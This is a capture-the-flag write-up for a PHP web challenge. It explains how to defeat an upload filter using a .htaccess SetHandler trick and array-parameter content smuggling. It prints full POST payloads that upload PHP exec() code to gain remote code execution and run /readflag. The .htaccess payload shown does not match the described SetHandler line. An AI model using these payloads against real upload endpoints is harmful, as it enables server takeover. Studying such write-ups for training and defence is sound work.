Skip to content

pcat/7/easygame

Name: easygame

Type: web

Author: kagi

Desc: bypass me

Link: http://139.9.251.90:8888/

Attach: None

Tips: None

Total: 125 First: 佚名 Second: Ricky Third: lu0sf

Writeup

<?php
highlight_file(__FILE__);
#### easy game

$upload = 'upload/'.md5("2021".$_SERVER['REMOTE_ADDR']);
@mkdir($upload);
file_put_contents($upload.'/index.php', '');
var_dump($upload);

if (isset($_POST['file']) && isset($_POST['file'])){
    if(preg_match('#.+\.ph(p[3457]?|t|tml)$|/#is',$_POST['file'])){
        die('file error');
    }
    if(preg_match('#\w{2,}|[678]|<\?|/#',$_POST['content'])){
        die('content error');
    }
    file_put_contents($upload.'/'.$_POST['file'], $_POST['content']);
}


if (isset($_GET['reset'])){
    @rmdir($upload);
} string(39) "upload/c946d761bddc7564ff3e45a77a54ae13"

We have access to the upload folder, but both the filename and the content are filtered. The question is to bypass the filter.

Bypass filename

The filename can't be uploaded using any kind of .php format. The only way is to upload a .htaccess file to identify the files in this folder are all executed using php.

.htaccess
SetHandler application/x-httpd-php

After that, we can upload any filename and open it, the file would be resolved using php.

But how can we upload the content in the .htaccess? Let's discuss below.

Bypass content

The filter is strict, all 2 length printable characters are not valid. However, we can use an array to bypass this filter.

def gen_content(inp):
    i = 1
    for c in inp:
        print('content['+str(i)+']=%'+hex(ord(c))[2:]+'&', end='')
    i += 1

Then we can upload any php script to server and gain RCE.

How to find the flag? After several searching in the server, we discovered a /readflag ELF to read the flag file. Execute it to get the flag.

Payload

.htaccess file upload:

file=.htaccess&content[1]=<&content[2]=?&content[3]=p&content[4]=h&content[5]=p&content[6]=%0a&content[7]=e&content[8]=x&content[9]=e&content[10]=c&content[11]=(&content[12]="&content[13]=l&content[14]=s&content[15]="&content[16]=)&content[17]=%0a&content[18]=?&content[19]=>

payload file upload:

file=payload&content[1]=<&content[2]=?&content[3]=p&content[4]=h&content[5]=p&content[6]=%0a&content[7]=e&content[8]=c&content[9]=h&content[10]=o&content[11]=%20&content[12]=e&content[13]=x&content[14]=e&content[15]=c&content[16]=(&content[17]="&content[18]=/&content[19]=r&content[20]=e&content[21]=a&content[22]=d&content[23]=f&content[24]=l&content[25]=a&content[26]=g&content[27]="&content[28]=)&content[29]=%0a&content[30]=?&content[31]=>

Flag

flag{46dd5c50-3e80-485e-80f4-f46b5d85f4b8}